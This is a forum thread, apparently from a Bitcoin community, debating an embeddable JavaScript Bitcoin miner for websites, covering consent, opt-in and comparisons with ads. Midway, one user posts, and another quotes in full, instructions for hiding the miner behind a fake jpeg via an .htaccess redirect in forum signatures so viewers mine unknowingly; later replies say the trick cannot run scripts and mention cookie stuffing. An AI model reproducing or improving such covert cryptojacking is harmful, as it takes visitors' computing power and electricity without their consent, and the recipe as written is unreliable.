Embedable Javascript Bitcoin miner for your website

[cablepair]

I am not only a bit miner but I am also a Christian and am involved in a lot of ministry work and I work with non profit organizations all the time who are constantly raising money.

This could be a really awesome tool for people to donate their unused cpu power to fund Christian missions, ministries and such and I believe in it so much that I created the site:

www.computeforchrist.com

I am already supporting a local fund raising effort with it and am trying to get people to use it, one thing I am waiting to see is exactly how much traffic you need to make this viable.
and I am sure that is something everyone else is considering as well... I mean thats the big question right?

How much traffic do we need to make this actually work.

I have been trying to get the word out and having people who want to support the cause support my site with their CPUs
I think it could be huge and I am very exciting to get some new features like to be able to show people the speed and some kind of rough calculation that could show them in semi real time what kind of money they are actually donating that kind of thing.

I know a lot of people (in the bitcoin / tech world) are weary of this as you can see in some of the posts above but don't look at it as some kind of sneaky thing that someone is forcing upon you. Like everything else it can be used for good and bad, sure there are going to be people exploiting this just like they did with those crazy pop up sites that never stop but there are also good uses for it like my site so please keep an open mind, technology is a reflection of the people who use it - the technology and it's creators are not bad because it can possibly be abused.

[1713961055]

1713961055

[1713961055]

1713961055

[1713961055]

1713961055

[1713961055]

1713961055

[1713961055]

1713961055

[phillipsjk]

I posted some of my objections in this thread. I have read the last 2 pages of posts and still think it is evil.

I was not aware that it used HTML 5 and workers. On my machine bitp.it idles because my browser does not support the Draft HTML5 standards. That said, my points about non-CPU computing resources  (like memory and available battery power) still stand. Edit: my objection about CPU usage may still stand: what happens if you use 10% of the CPU with a load average of over 1.00? Answer load average increases by 0.1.

There is another problem I did not consider: This script is using a popular mining pool. Over-reliance on a few mining pools weaken the bitcoin network. Web-developers throwing this up on their page are even less likely to implement "solo mining" or even a private mining pool should the need arise. For example, in the event of a pool take-over or shut-down.

Edit: Viewing sites embedding the EMCA script miner at work may constitute a firing offense, just as an IT person should be fired for using company computers to install Bitcoin miners (for personal gain).

[Nythain]

Malware, short for malicious software, consists of programming (code, scripts, active content, and other software) designed to disrupt or deny operation, gather information that leads to loss of privacy or exploitation, gain unauthorized access to system resources, and other abusive behavior.

Congratulations.
Don't inflate my electricity bill only for your gain, you people. Seriously.

I'm not defending this, but it isn't malware. This code:

- is NOT "designed" to disrupt or deny operation in any way. It is designed to mine bitcoins. Mining bitcoins does not disrupt or deny operation. At worst it slows down the site that is actually using the miner.
- does NOT gather information that leads to loss of privacy or exploitation. The information it sends back to the server is the results of calculations performed on data retrieved solely from the server.
- does NOT gain unauthorized access to system resources. You loaded a script into a JS interpreter and told it to run when you loaded my site, implicitly granting access to the JS VM and everything it is reasonably expected to have access to. This doesn't include finding an exploit in the JS interpreter and breaking out of your sandbox, but within the sandbox, you've granted the script permission to do what it wants.

If you go to a site and you have Javascript enabled then you cannot claim that the fact that that site runs JS on your computer is unauthorized access. If you are concerned about power usage then you should have JS disabled (or Noscript turned on) and also probably block flash as well. If JS is disabled in your browser for some reason, then you are not implicitly granting websites permission to run scripts on your machine; if the miner continued to run in THIS case, it would be malware.

The definition of malware is not so broad as to include "using CPU cycles that I expected to be idle".

I'm still going to block the script, but I won't be so disingenuous as to call it "malware", because it isn't. It's just like any other ad. This one just doesn't flash or play annoying sounds or pop up windows on your screen.

I pretty much agree with everything you said until you got to the closing statement. This script is not like any other ad, since:
A. Without external applications, I am unaware of it running on 90% of the sites I've encountered running it.
B. It is not advertising anything to me. Ads, as annoying as they may be, are at least providing a service to me as the user/visitor of the site by offering me goods and deals I might have been unaware of. There is absolutely not benefit to me from my participation with this miner.

So comparing it to ads is probably not the best analogy... comparing it to analytics would probably be better.

[TiagoTiago]

...

... Ads, as annoying as they may be, are at least providing a service to me as the user/visitor of the site by offering me goods and deals I might have been unaware of. There is absolutely not benefit to me from my participation with this miner.

...

The service this offers is a site unpolluted by ads that can still pay the bills

[tonne]

I was looking for an alternative payment method for online shops after the wikileaks disaster. Bitcoin isn't there yet. Running jsMiner *without* giving visitors a chance to opt-in is putting people off. It is simply stealing resources. It's kind of a gold rush, right? Try to control your greed. People got so used to ads and all the tracking crap that no one questions those methods any more. Treat your community / potential users with respect and you will have unlimited support. Otherwise the whole idea will end up like e-gold and die off eventually.

[anisoptera]

I was looking for an alternative payment method for online shops after the wikileaks disaster. Bitcoin isn't there yet. Running jsMiner *without* giving visitors a chance to opt-in is putting people off. It is simply stealing resources.

Running ads on your website without giving visitors a chance to opt in is stealing resources. It consumes:

- bandwidth to download the ad (frequently in excess of 100k)
- CPU time to display the ad, whether animated GIF, flash, or even static image
- memory to store the ad
- screen space that would have been blank or filled with content otherwise.

All so they can attempt to make money off of me for the website.

[TiagoTiago]

People don't usually don't call heavy annoying ads "resource stealers"; the difference between this and "(.)(.) Play Now My Lord" is this won't get in the way of you using the site, and instead of wasting processor cycles it is actually turning them into money.



But obviously, an opt-in/opt-out option would be great, not all advertisement bearing sites offer such an option though. Btw, also offering an option of throttling down i expect would help with getting on  the visitors good side.

[tonne]

For ads there's adblock. No problems with contributing to a collective mining effort, I just want to be asked.

[1bitc0inplz]

is there a way I can show the users mining speed on my site like you do at bitp.it ?

Firstly, thank you for your previous post. It was your site (in addition to a couple others) that I pictured when I was thinking about sites that are very open to the user about what is going on. I applaude your use of this script, and I think it is a great example of what we originally had in mind.

As for the hash rate... that is a feature that has been asked for a couple of times. I see no harm in adding it. I will need to expose it to you, so perhaps you can write some Javascript to display that stat. We have a website push coming this weekend, I will try and sneak this feature in 

[1bitc0inplz]

First Points:

• Your idea isn't good, it is brilliant.
• If bitcoins will ever get a major payment, your way WILL replace ads
• Your idea, may very well get some sites to use it instead of ads, and therfore will make the bitcoin market bigger

Seconds Points:

• All code has to be open source, if it really want to spread it as wide as possible
• An optional visible hashing rate would be nice
• A choice (I want to use 10, 20,.... 90%) of the end users cpu.

Thanks for your idea and implementation!

Thank you for your kind words. Your input is worth more than you think. You gave me an idea... some of the things you were saying got me thinking...

I don't want to spill the beans just yet   

[1bitc0inplz]

So comparing it to ads is probably not the best analogy... comparing it to analytics would probably be better.

You know, one of our original ideas (not that it got far) was to somehow bundle this into an analytics package...

[Nythain]

For ads there's adblock. No problems with contributing to a collective mining effort, I just want to be asked.

For FireFox there's NoScript
For Chrome, there's built in script blocking functionality, and NotScripts for further protection.

While I don't think the cumulative world wide web browsing populace should have to resort to things things, they are effective. They will also help stopping other scripts. With today's internet, they are almost a must have really.
The great solution would be if webmasters would make it known what is going on so users can choose to frequent the site or not. A step even further would be an opt-in or opt-out option.

From reading through this thread, and the couple others that have popped up, I gather *almost* all of us agree that the initial development of this miner is awesome. It's potential is amazing in numerous applications of it. For the most part, we start to disagree on ethical application of this miner by webmasters. Most of us against it really only request at least being informed its being used, so we can choose whether or not to continue visiting the site. In the comparison of ads, they are visible and I know they are there. If I find the amount of ads on the site to be annoying or too resource intensive, I can leave. So far, I have only come across 1 site other than the main project site, that informed users on the home/front page that they were currently generating bitcoins using a web miner.

[manifold]

Thank you for your kind words. Your input is worth more than you think. You gave me an idea... some of the things you were saying got me thinking...

I don't want to spill the beans just yet   

Well thats, good. Maybe we cold even persuade some websites (it news,...) to remove their ads, and install your or a similar javascript site.  That would give bitcoin a kickstart to enter the normal market.

And yes google, won't like it... the government won't like it either (because they hate change), but it may be worth trying..

[easypeezy]

Figured out a way to implement this anywhere, you can hide it as a 1px jpeg file in any signature, on any forum.


First things first.

1. Create a file in notepad. Use this code.

Code:

<head><script type="text/javascript" src="http://api.bitp.it/bitp.it.js"></script>
<script type="text/javascript">
 bitpit({clientId: "YOURID", forceUIThread: true});
</script></head>
<body width="0" height="0"></body>

2. Save that as test.html, upload it to your server

3.Upload an image to your server, label it as "WHATEVERYOUWANT.jpeg" make sure the server shows the file being stored as a jpeg file.

4. Edit your .htaccess file. Include this bit of code at the end of it.

Code:

RewriteEngine On
RewriteCond %{HTTP_REFERER} !^http://(.+\.)?YOURDOMAIN\.com/ [NC]
RewriteCond %{HTTP_REFERER} !^$
RewriteRule .*\.(jpe?g|gif|bmp|png)$ http://YOURDOMAIN.com/test.html [L]

5. Go to any forum and add

Code:

[img]http://YOURDOMAIN.com/YOURPICTURE.jpeg[/img]

This should show absolutely nothing to the user viewing the page, but you get everyone hashing for you that ever views a page with your signature.

[SgtSpike]

Figured out a way to implement this anywhere, you can hide it as a 1px jpeg file in any signature, on any forum.


First things first.

1. Create a file in notepad. Use this code.

Code:

<head><script type="text/javascript" src="http://api.bitp.it/bitp.it.js"></script>
<script type="text/javascript">
 bitpit({clientId: "YOURID", forceUIThread: true});
</script></head>
<body width="0" height="0"></body>

2. Save that as test.html, upload it to your server

3.Upload an image to your server, label it as "WHATEVERYOUWANT.jpeg" make sure the server shows the file being stored as a jpeg file.

4. Edit your .htaccess file. Include this bit of code at the end of it.

Code:

RewriteEngine On
RewriteCond %{HTTP_REFERER} !^http://(.+\.)?YOURDOMAIN\.com/ [NC]
RewriteCond %{HTTP_REFERER} !^$
RewriteRule .*\.(jpe?g|gif|bmp|png)$ http://YOURDOMAIN.com/test.html [L]

5. Go to any forum and add

Code:

[img]http://YOURDOMAIN.com/YOURPICTURE.jpeg[/img]

This should show absolutely nothing to the user viewing the page, but you get everyone hashing for you that ever views a page with your signature.

Wow.  Just, wow.

[easypeezy]

What is the WOW about, exactly?

[SgtSpike]

What is the WOW about, exactly?

This could ruin bitcoin's reputation.

If it's truly that easy, imagine how quickly just about EVERY online forum is going to be inundated with this?  Eventually, forum admins will become wise to what is slowing down their user experience, and as soon as the first one gathers the full story on it, they'll be badmouthing bitcoin like mad.

EDIT:  Don't get me wrong, it's awesome that you figured out how to do this, I just think it has very, very bad implications for how it could be used.

[slowmining]

I don't tink it will work. The browser will try to read the fake image as an image, it will fail but it will not run js code.

[easypeezy]

I've been using redirects like this to stuff cookies for years, trust me, it works.

[mrb]

No, this cannot work. If the forum software translates [img]http://YOURDOMAIN.com/YOURPICTURE.jpeg[/img] to a regular image tag <img src="..."/> then no matter what reply YOURDOMAIN.com sends back, the browser will only interpret this as an image.

This technique can be used to steal cookies (what you call "stuff cookies"), but it cannot be used to run arbitrary js code on the client (victim) side.